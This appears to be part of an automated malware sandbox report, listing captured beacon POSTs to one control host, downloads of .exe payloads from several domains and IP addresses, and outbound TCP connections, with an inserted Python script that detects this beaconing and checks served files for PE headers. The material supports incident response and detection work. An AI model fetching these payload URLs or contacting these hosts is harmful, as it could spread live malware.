Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jvggxpunvp.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 234 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://utujjcpga.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 302 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://anaxqk.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 221 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://aeoceljuvu.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 353 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: privacy-tools-for-you-780.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tavpv.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 213 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ylklohfb.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 156 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /install5.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://snjxprkrs.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 364 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ognsyxbqt.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 177 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mqsidiop.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 116 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ffjbt.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 166 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /game.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xhmgc.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 253 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dlrkn.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 236 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hqphi.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 307 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hrbkqnyvuq.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 247 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /6.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.7.214.171:8080
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://oanyhf.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 310 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ebkix.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 287 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kglcf.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 362 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ralhhxo.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 353 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ucqxo.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 150 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rvrxkhapq.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 203 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tmefv.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 117 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ublgjca.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 172 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uauswjxvxi.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 235 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ihlanbec.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 308 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ocvhk.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 120 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bunksfs.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 153 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bhqyvtr.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 133 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vvcoavsyoi.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 362 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mgspnorl.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 251 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jlttjsjsn.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 360 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lwmkqmxs.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 337 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wodlytuu.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 152 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://opwshtlv.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 123 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://iofaey.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 364 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ndvhcbnqxy.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 145 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://slwqa.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 232 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mudbgksxf.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 201 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ltpsu.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 362 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lkdybspw.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 239 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tumar.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 141 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dxlbaxnq.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 224 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /l3.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 81.163.30.181
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vmrsokyf.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 133 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kuhyti.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 299 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jhryuyevsi.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 239 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tsjnpmoxk.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 279 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dhgvgbi.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 283 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://sthgmss.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 141 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lqucepm.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 288 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://drivqge.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 163 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://srpcpdlmu.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 337 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://sbdfkwshp.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 331 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /l2.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 81.163.30.181
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://getygnekfa.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 200 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://svqaek.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 305 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vcddpnrql.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 151 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lchxcgbqi.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 267 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ksxvhtvig.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 318 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nxrloqgt.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 274 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://aeymga.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 201 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://duekablkqo.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 223 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://foilygkb.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 219 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://babqykwmy.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 265 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ygspe.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 139 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://sytacviqe.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 125 | Host: host-data-coin-11.com
Source: global traffic | TCP traffic: 192.168.2.5:49804 -> 185.7.214.171:8080
Source: global traffic | TCP traffic: 192.168.2.5:49902 -> 86.107.197.138:38133
Source: global traffic | TCP traffic: 192.168.2.5:49823 -> 52.101.24.0:25
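Detection logic over the request records listed above, as an added example that is not part of this sandbox report or of any vendor tool. It parses records in the flattened "Header: valueHeader: value" form this page uses, flags the beacon pattern visible above (repeated POST / to one Host, each with a different Referer on an unrelated domain, all with the same fixed IE11 User-Agent), lists the .exe fetches, and checks the bytes a server returned for a PE header using the "Data Raw" dump above. Assumptions, also marked in the code: the header-name list covers the records being parsed, the threshold of five POSTs is a chosen value, and the PE sample zero-fills the DOS stub and Rich header between the two header fragments copied from the page.

```python
"""Checks over the HTTP request records in this report (added example).

Parses records in the flattened "Header: valueHeader: value" form the report
uses, then applies three checks a responder would want over such traffic:
  1. beaconing: many POST / requests to one Host whose Referer names a
     different domain every time (a browser never does this; a loader
     faking a fresh Referer per check-in does);
  2. payload fetches: GET requests for .exe paths;
  3. served-file check: leading bytes of a response, given as the report's
     "Data Raw" hex, parsed as a PE header to confirm an executable came back.
Sample data below is constructed from values that appear on this page.
"""
import re
import struct
from collections import defaultdict
from urllib.parse import urlsplit

# Header names seen in this report's request records (assumption: the list is
# complete for the records parsed). The report runs headers together with no
# separator, so a record is split just before each known name.
HEADER_NAMES = ("Connection", "Content-Type", "Accept", "Referer",
                "User-Agent", "Content-Length", "Host")
SPLIT_RE = re.compile(r"(?=(?:%s): )" % "|".join(HEADER_NAMES))
REQ_RE = re.compile(r"(GET|POST) (\S+) HTTP/1\.[01]")


def parse_record(line):
    """One flattened request record -> {"method", "path", "headers"}."""
    body = line.split("HTTP traffic detected: ", 1)[1]
    m = REQ_RE.match(body)
    if not m:
        raise ValueError("not an HTTP request record: %r" % line[:60])
    headers = {}
    for chunk in SPLIT_RE.split(body[m.end():]):
        if chunk:
            name, value = chunk.split(": ", 1)
            headers[name] = value
    return {"method": m.group(1), "path": m.group(2), "headers": headers}


def find_beacon_hosts(records, min_posts=5):
    """Hosts with >= min_posts POSTs, each carrying a unique Referer whose
    domain is not the Host itself. min_posts is a chosen threshold."""
    by_host = defaultdict(list)
    for r in records:
        if r["method"] == "POST":
            by_host[r["headers"].get("Host", "")].append(r)
    hits = {}
    for host, posts in by_host.items():
        referers = {urlsplit(p["headers"].get("Referer", "")).hostname for p in posts}
        referers.discard(None)
        referers.discard(host)
        if len(posts) >= min_posts and len(referers) == len(posts):
            hits[host] = {"posts": len(posts),
                          "user_agents": sorted({p["headers"].get("User-Agent", "")
                                                 for p in posts})}
    return hits


def find_exe_downloads(records):
    """(Host, path) for every GET whose path ends in .exe."""
    return [(r["headers"].get("Host", ""), r["path"]) for r in records
            if r["method"] == "GET" and r["path"].lower().endswith(".exe")]


def classify_pe(data_raw_hex):
    """Classify a served file from its leading bytes (space-separated hex).
    Returns e.g. 'PE32+ x64, 7 sections' or the reason it is not a PE."""
    data = bytes.fromhex(data_raw_hex)  # whitespace between bytes is ignored
    if data[:2] != b"MZ":
        return "not MZ"
    if len(data) < 0x40:
        return "MZ, truncated before PE header"
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if len(data) < e_lfanew + 26:
        return "MZ, truncated before PE header"
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "MZ without PE signature"
    machine, nsections = struct.unpack_from("<HH", data, e_lfanew + 4)
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]  # optional header
    arch = {0x14C: "x86", 0x8664: "x64", 0xAA64: "arm64"}.get(machine, hex(machine))
    kind = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, hex(magic))
    return "%s %s, %d sections" % (kind, arch, nsections)


# Constructed sample records in the report's flattened format, using Referer
# domains, lengths, hosts and the User-Agent shown on this page.
UA_IE11 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
SAMPLE_RECORDS = [
    "Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-Alive"
    "Content-Type: application/x-www-form-urlencodedAccept: */*Referer: http://%s/"
    "User-Agent: %sContent-Length: %dHost: host-data-coin-11.com" % (ref, UA_IE11, n)
    for ref, n in [("sasldotps.net", 160), ("hvxghwlm.org", 347), ("gvuhy.com", 266),
                   ("xcewx.net", 166), ("fuylvs.net", 234), ("ejshmyhdg.net", 128)]
] + [
    "Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe "
    "HTTP/1.1Connection: Keep-AliveUser-Agent: %sHost: data-host-coin-8.com" % UA_IE11,
    "Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: "
    "Keep-AliveUser-Agent: %sHost: 185.7.214.171:8080" % UA_IE11,
]

# First 64 bytes and the 26 bytes at the PE signature come from the "Data Raw"
# dump above; the DOS stub and Rich header between them are zero-filled here
# (constructed), which does not change how the header is parsed.
SAMPLE_PE_HEX = (
    "4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 "
    "40 00 00 00 " + "00 " * 32 + "00 01 00 00 " + "00 " * (0x100 - 0x40)
    + "50 45 00 00 64 86 07 00 cb 9e e1 61 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02"
)

if __name__ == "__main__":
    recs = [parse_record(line) for line in SAMPLE_RECORDS]
    print("beacon hosts:", find_beacon_hosts(recs))
    print("exe downloads:", find_exe_downloads(recs))
    print("served file:", classify_pe(SAMPLE_PE_HEX))
```

The Referer check is the discriminating signal: a real browser sends a Referer on the same site it is navigating, while every POST above names a fresh, unrelated domain against the same Host, so the ratio of distinct foreign Referers to POSTs is 1.0. On the response side, the classifier confirms from the first bytes that what came back as application/x-msdownload is a PE32+ x64 image with seven sections, matching the section table visible in the dump.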
Source: svchost.exe, 00000006.00000002.567765167.000002717EE5F000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000002.411996831.000000000542B000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.409119888.000000000542A000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.408591760.0000000005422000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000006.00000002.567765167.000002717EE5F000.00000004.00000001.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000000A.00000002.306093914.0000024F15C13000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.xboxlive.com
